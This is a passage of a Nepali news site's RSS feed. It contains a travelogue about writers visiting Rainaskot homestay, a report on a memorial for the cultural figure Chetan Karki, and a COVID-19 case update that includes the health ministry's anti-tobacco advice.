यसअघि आयोजक प्रतिष्ठानका अध्यक्ष पहाडीले सोही गाउँमा पैतृक स्थलो भएका राइनास होमस्टेका परिकल्पनाकार राइनास नगरपालिकाका मेयर खड्गबहादुर गुरुङलाई साहित्यकारको टोली आउँदैछ भनेर अग्रिम जानकारी दिनु भएको थियो । राति राइनासकोटको सामुदायिक होमस्टेमा बस्ने र भोलिपल्ट राइनासकोटको अध्ययन भ्रमण गर्ने योजना थियो ।
मांसाहारी र साकाहारीलाई अलग अलग ठाउँमा व्यवस्थापन :
कति पाहुना आउने र कति जना मांसाहारी अनि कति जना साकाहारी भनेर पहिल्यै विवरण मागिएको थियो । हामी राइनास कोटको सामुदायिक होमस्टेमा पुग्ना साथ होमस्टेका अध्यक्षले तपाईहरू कताबाट आउनु भएको भनेर सोध्नु भयो । साहित्यकारहरूको नेतृत्व गरिरहेका एक जनाले भने हामी साहित्यकारको टीम काठमाडौंबाट आएका हौं । उनले हाम्रो टोलीलाई विभाजन गर्यो । मांसाहारी र साकाहारीलाई अलग अलग ठाउँमा व्यवस्थापन गर्यो ।
हामी मांसाहारी जम्मा ९ जना भयौं । हाम्रा लागि खाना एक ठाउँमा बन्यो । खाना खानु भन्दा अगाडि हामीलाई पानी, चिया मकैका लाया र अचार खान दिएर स्वागत गरेको थियो । खाना खानु अघि खान खाई सके पश्चात् पनि थुप्रै मीठा मीठा गफहरू ठोकिए साथीहरूको माझमा । सुत्ने बेला व्यवस्थापकले अरु कोठाहरूमा पनि सुत्ने व्यवस्था मिलाए ।
भोलिपल्ट ११ गते बिहान ५ः०० बजे सबै नित्यकर्म गरी राइनासकोटको दृश्यावलोकनका लागि तयार भयौं । गाडीमा जाने कि ! हिडेर जाने भनेर एक छिन टिममा छलफल भयो । कच्ची बाटो ठूलो गाडी उकालो चढ्न नसक्ने र हिडेर जाँदा बाटो छोटो पर्ने कुरा जानकारीमा आएपछि हामी हिड्दै फोटा खिच्दै राइनासकोटको चुचुरोमा पुग्यौं । बिहानको बेला थियो, राइनासकोट कुइरोको सेतो घुम्टो भित्र लुकिरहेको थियो । हामीले उसको घुम्टो खोलेर उसको अनुहार मात्र हेरेनौं कि ऊ सित हामीले फोटा खिच्यौं र सेल्फी पनि हान्यौ ।
राइनासकोट र शाहवंशको साइनो :
राइनासकोटमा एउटा कटेज खोलेर चिया पसल चलाएका एक जान स्थानीय व्यक्ति गजमान घलेबाट राइनास कोटकोबारे मैले केही जानकारी लिन खोजे । उहाँले राइनासकोट र शाहवंशको गठिलो साइनो रहेको बताउनु भयो । राइनासकोटमा नरभुपाल शाहका कान्छा छोरा द्रव्य शाहले शासन गरेको स्थलो भएको जानकारी दिनु भयो । दाजु नरहरी शाह भन्दा भाइ द्रव्य शाह बलशाली थिए भन्ने भनाइ छ । राइनासकोटको चारै दिशातिर उनका फौंजहरू राखेका थिए । यी थुम्का जस्ता टाकुराहरूमा द्रव्य शाहका घोडा राख्थे । घोडाको तबेला थियो । त्यहाँ आगो ताप्ने अँगेना पनि रहेको थियो ।
होमस्टेमा कोदो, फापरका सेल र तरकारी नास्ता निकै स्वादिलो :
राइनासकोटमा गुरुङ र लामाहरूको वस्ती छ । राइनासकोट नजिकै दुई वटा सालिकहरू राखिएका थिए । ती सालिकहरू स्व. जिमाल नरबिरे गुरुङ लामा र स्व. नन्द लामा गुरुङका थिए । एक घण्टाको अध्ययन अवलोकन पछि हामी होमस्टेमै फिर्ता भयौं । होमस्टेमा कोदो, फापरका सेल र तरकारी बनेको थियो । नास्ता निकै स्वादिलो बनेको थियो र खायौं ।
१९ जिल्लाको दृश्यावलोकन गर्न सकिने राइनासकोट र लालीगुँरासको जाम :
फर्किनु भन्दा अगाडि राइनास नगरपालिकाका मेयर खडगबहादुर गुरुङसँग भेटघाट गर्यौं । उहाँकै निवासमा लालीगुँरासको चिया खाएर अनुभवहरू आदान प्रदान गरियो । उहाँले भने ‘पर्यटनका लागि राइनासकोट निकै सम्भावना बोकेको क्षेत्र हो । माथि कोटबाट १९ वटा जिल्लाको दृश्यावलोकन गर्न सकिन्छ । राइनासकोट वरिपरि रहेका लालीगुँरासको प्रशोधन गरेर जामहरू बनाएको पनि उहाँले सुनाउनु भयो । उहाँले भन्नुभयो, ‘यो कोदोे, फापर, सिस्नोको पिठो बनाएर पर्यटकलाई खुवाउन सक्ने उपहार वा किनेर लान सकिने सम्भवना छ । गाउँबाट सबै पलायन भएर विदेशीनुले गाउँ नै खाली हुने हो कि !’ भनेर चिन्ता पनि व्यक्त गर्नु भयो । उहाँले रोचकता साथ सुनाउनुभयो, ‘बुद्धि भएका, बल भएका र पैंसा भएका जति विदेश गइसकेका छन् ।’
मेयर सित भेटपछि फेरी होमस्टेमा गयौं । हामस्टेका आमाहरूले टिका लगाएर हाम्रो विदाइ गर्नु भयो । नमस्ते गर्दै हामी गाडीमा बस्यौं । मुग्लिङ बजारसम्म रमाइलो गर्दै काठमाडौंका साथीहरूसँगै म फर्किएँ । मुग्लिङबाट साथीहरूलाई विदाईका हात हल्लाउँदै बिदा भए । मुग्लिङमा दुई घण्टा प्रतिक्षा गरेपछि पोखराबाट महेन्द्रनगरका लागि आएको बसमा चढेर आफ्नो निवास पश्चिम तिर लागे ।
मेलौली– ७, बैतडी ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23504 0
स्वाभिमान जोगाउँदा ओझेलमा परेका व्यक्तित्व : चेतन कार्की https://www.antaranganews.com/?p=14972 https://www.antaranganews.com/?p=14972#respond Wed, 17 May 2023 23:43:56 +0000 https://www.antaranganews.com/?p=14972 पोखरा– वरिष्ठ साहित्यकार, संस्कृतिकर्मी तथा चलचित्रकर्मी चेतन कार्कीको दोस्रो स्मृति दिवस यहाँ विशेष कार्यक्रमका बीच गरिएको छ । हिमाली सांस्कृतिक परिवारद्वारा आयोजित स्मृति सभाका वक्ताले कार्कीलाई स्वाभिमान जोगाउँदा ओझेलमा परेका प्रतिभाका रुपमा चिनाएका थिए ।
हिमाली सांस्कृतिक परिवारका प्रमुख संरक्षक रहेका कार्कीको स्मृतिमा निर्माण गरिएको ‘चेतन कार्की स्मृति कक्ष’मा आयोजित सभाका वक्ताले त्यस्तो धारणा व्यक्त गरेका हुन् ।
कार्यक्रमका प्रमुख अतिथि वडा नं. ९ का वडाध्यक्ष दीपेन्द्र मर्सानीले पोखराको कला, साहित्य संस्कृति संरक्षणमा चेतन कार्कीले पुर्याएको योगदानको उचित कदर हुन नसकेकोमा चिन्ता व्यक्त गर्नु भयो । उहाँले सांस्कृतिक कार्यक्रम गरेर आजको पोखराको महेन्द्रपुल पहिलो चोटी बनाउनका लागि पहिलो सांस्कृतिक कार्यक्रम गरेर निर्माण गरेको स्मरण गर्दै वडा नं. ९ ले हिमाली सांस्कृतिक परिवारको अग्रसरतामा महानगर विद्यालयस्तरीय चेतन कार्की स्मृति विशेष कार्यक्रम आयोजना गर्ने प्रतिवद्धतासमेत व्यक्त गर्नु भयो ।
संस्कृतिकर्मी तीर्थ श्रेष्ठले चेतन कार्कीका विविध आयामबारे चर्चा गर्दै कार्कीले लेखेको ‘आत्मा बेचेको छैन’ उपन्यासका माध्यमबाट नेपाली आख्यान साहित्यमा दिएको योगदानको जति चर्चा हुनुपर्ने थियो त्यो नहुनु दुःखद भएको बताउनु् भयो । उहाँले स्वाभिमानका खातिर दुःख भोग्न तयार हुने चेतन कार्कीले स्वाभिमान नजोगाएको भए धेरै महत्वपूर्ण अवसर पाउने व्यक्तित्व भएको स्मरण गर्नुभयो ।
पोखरा प्रज्ञा–प्रतिष्ठानका कुलपति पद्मराज ढकालले कार्कीको छत्रछायामा आफूँ विभिन्न प्रतियोगितामा सहभागी भएको स्मरण गर्नुभयो । २०५० सालदेखि कार्कीको कला कौशलतालाई नजिकैबाट चिनेको र संस्कृतिविद्को पनि अभिभावक कार्की भएको उहाँको तर्क थियो ।
जनकवि धर्मराज– सावित्री थापा स्मृति प्रतिष्ठानका संरक्षक कुञ्जराज थापाले संस्कृतिको गाँठो निकै गहिरो र बलियो हुने बताउनु भयो । आफूले कक्षा– ७/८ पढ्दादेखि चेतन कार्कीलाई चिनेको र सीमित व्यक्तित्वसँग मात्र देश राज्यलाई र समाजलाई जोड्ने प्रतिभा हुने ती मध्येका एक प्रतिभा कार्की भएको उल्लेख गर्नुभयो ।
कार्यक्रममा हिमाली सांस्कृतिक परिवारका अध्यक्ष ज्ञानबहादुर थापा, वरिष्ठ उपाध्यक्ष गजबहादुर गुरुङ, सचिव मनबहादुर गुरुङलगायतको चेतन कार्कीले हिमाली सांस्कृतिक परिवारलाई आजको अवस्थासम्म ल्याउन पु¥याएको योगदान, व्यक्तित्व र कृतित्वबारेमा प्रकाश पार्नु भएको थियो ।
– असफल गौतमको सहयोगमा ।

]]>
https://www.antaranganews.com/?feed=rss2&p=14972 0
कोरोना अपडेट : आज संक्रमित संख्या झण्डै तीन अंकमा, ५९ जना संक्रमणमुक्त https://www.antaranganews.com/?p=14491 https://www.antaranganews.com/?p=14491#respond Wed, 03 May 2023 15:42:44 +0000 https://www.antaranganews.com/?p=14491 काठमाडौं– नेपालमा कोरोना संक्रमित संख्या झण्डै तीन अंकमा पुगेको छ । पछिल्लो २४ घण्टामा ९१ जनामा कोरोना भाइरस संक्रमण पुष्टि भएसँगै बैशाख २० गते त्यस्तो खुलासा भएको हो ।
आज कुल दुई हजार ५३२ नमुना परीक्षणमा ९१ जनामा संक्रमण पुष्टि भएको स्वास्थ्य तथा जनसंख्या मन्त्रालयले जनाएको छ । मन्त्रालयका अनुसार ३३६ पीसीआर परीक्षणमा २७ र दुई हजार १९६ एन्टिजेन परीक्षणमा ६४ जनामा संक्रमण देखिएको हो ।
पछिल्लो २४ घण्टामा कोरोना भाइरस संक्रमणबाट कसैको पनि मृत्यु नभएको मन्त्रालयले जनाएको छ ।
त्यस्तै पछिल्लो २४ घण्टामा ५९ जनाले कोरोना जितेर संक्रमणमुक्त भएका छन् । हाल देशभर कोरोना भाइरसको सक्रिय संक्रमितको २२० रहेको छ । तीमध्ये २५ जना अस्पतालमा भर्ना भएका छन् । अस्पतालमा भर्ना भएका मध्ये १२ जना आइसीयुमा उपचाररत रहेको स्वास्थ्य तथा जनसंख्या मन्त्रालयले जनाएको छ ।
‘कोरोना सङ्क्रमणबाट बच्न सुर्तीजन्य पदार्थको सेवन नगरौँ’
स्वास्थ्य तथा जनसंख्या मन्त्रालयले कोरोना भाइरसको सङ्क्रमणबाट बच्न सुर्तीजन्य पदार्थको सेवन नगर्न आग्रह गरेको राससले जनाएको छ ।
धूम्रपानले फोक्सोको क्यान्सर निम्त्याउने सम्भावना २२ गुणाले बढाउने मन्त्रालयले जनाएको छ । कोरोना भाइरसले फोक्सोलाई क्षति पु¥याउने र सुर्तीजन्य पदार्थ सेवन गर्नेको फोक्सोमा पहिले नै समस्या भइसकेकाले सुर्तीजन्य पदार्थको सेवन नगर्न मन्त्रालयका सहप्रवक्ता डा समिरकुमार अधिकारीले आग्रह गरिएको बताउनु भयो । उहाँले जारी गरेको सूचनामा भनिएको छ, ‘कोरोना भाइरसले फोक्सोलाई क्षति पु¥याउँछ । सुर्तीजन्य पदार्थको सेवन गर्नेको फोक्सो पहिले नै समस्या भइसकेको हुन्छ, त्यसैले कोरोना भाइरसबाट बच्नका लागि सुर्तीजन्य पदार्थको सेवन गर्नु हुँदैन ।’
सुर्तीजन्य पदार्थ सेवन गर्दा ओठ, मुख औलाले छुनुपर्ने हुँदा कोरोना सङ्क्रमण सजिलै सर्ने सम्भावना बढी हुने सहप्रवक्ता डा अधिकारीले उल्लेख गर्नुभयो । ‘सुर्तीजन्य पदार्थ एकापसमा साटासाट गरी सेवन गर्ने क्रममा एक व्यक्तिबाट अर्को व्यक्तिमा सङ्क्रमण सर्न सम्भावना बढी हुन्छ, एउटै हुक्का, चिलिम प्रयोग गरी पालैपालो सेवन गर्दा एक व्यक्तिबाट अर्को व्यक्तिमा सङ्क्रमण फैलिन सक्छ ।’
सुर्तीजन्य पदार्थको सेवनले शरीरको रोग प्रतिरोधात्मक शक्तिलाई असर गर्ने र त्यसले सङ्क्रमण हुने सम्भावना बढाउने मन्त्रालयको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=14491 0